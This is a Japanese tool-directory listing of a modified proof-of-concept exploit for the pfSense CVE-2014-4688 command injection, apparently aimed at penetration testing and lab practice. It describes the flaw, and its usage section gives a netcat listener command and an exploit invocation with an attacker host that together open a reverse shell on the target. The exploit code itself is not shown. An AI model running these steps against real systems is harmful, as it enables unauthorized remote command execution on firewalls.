Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-4688-pfsense — CVE-2014-4688の修正版概念実証エクスプロイト。pfSense status_rrd_graph_img.phpのコマンドインジェクション脆弱性で、SSL処理付きの認証済みリモートコード実行を可能にする。 | Kitploit
ツール/GitHubGitHub/jaydenblair/cve-2014-4688-pfsense
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHubjaydenblair/cve-2014-4688-pfsense

CVE-2014-4688-pfsense

CVE-2014-4688の修正版概念実証エクスプロイト。pfSense status_rrd_graph_img.phpのコマンドインジェクション脆弱性で、SSL処理付きの認証済みリモートコード実行を可能にする。

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2014-4688 – pfSense コマンドインジェクション

CVE-2014-4688 用の修正版 Exploit-DB プルーフ・オブ・コンセプト (pfSense status_rrd_graph_img.php コマンドインジェクション)

概要

このリポジトリには、CVE-2014-4688 のオリジナルの Exploit-DB プルーフ・オブ・コンセプトの修正版が含まれており、pfSense バージョン ≤ 2.1.3 に影響します。

この脆弱性は status_rrd_graph_img.php コンポーネントに存在し、database パラメータの入力サニタイズが不適切なため、認証されたユーザーが任意のシステムコマンドを実行できるようになります。

  • オリジナルのエクスプロイト作者: absolomb
  • オリジナルソース: Exploit-DB

脆弱性の概要

  • CVE: CVE-2014-4688
  • 影響を受けるバージョン: pfSense ≤ 2.1.3
  • コンポーネント: status_rrd_graph_img.php
  • 影響: 認証されたコマンド実行

認証されたユーザーは、脆弱なエンドポイントに提供される細工された入力を介して、任意のシェルコマンドを注入できます。

変更点

  • 自己署名証明書環境向けのセッションスコープの SSL 処理を追加
  • urllib3 の不安全なリクエスト警告を抑制

使用方法

リスナーを起動:

root@kitploit:~
nc -lvnp <LPORT>

概念実証:

root@kitploit:~
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>

例

root@kitploit:~
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password

免責事項

このリポジトリは、許可されたセキュリティ研究、教育、および管理されたテスト目的のみで提供されます。 明示的な許可なくシステムに対して不正に使用することは、違法であり非倫理的です。

ツールをダウンロード